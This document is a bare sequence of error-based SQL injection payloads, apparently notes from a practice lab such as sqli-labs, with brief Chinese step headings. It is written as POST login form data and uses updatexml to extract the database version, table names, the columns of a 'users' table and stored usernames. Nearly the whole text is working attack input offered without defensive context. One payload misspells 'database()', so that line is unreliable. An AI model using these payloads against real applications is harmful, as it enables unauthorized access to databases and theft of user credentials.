uname=admin&passwd=admin' and updatexml(1,concat(0x7e,version(),0x7e),1)--+ &submit=Submit
1
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,databse(),0x7e),1)--+ &submit=Submit
查表
1
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+ &submit=Submit
1
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1)--+ &submit=Submit
查字段
1
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x7e),1)--+ &submit=Submit
1
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 1,1),0x7e),1)--+ &submit=Submit
1
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x7e),1)--+ &submit=Submit
查值
1 2
uname=admin&passwd=admin' and updatexml(1,concat(0x7e,(select username from (select username from users limit 0,1)text),0x7e),1) --+ &submit=Submit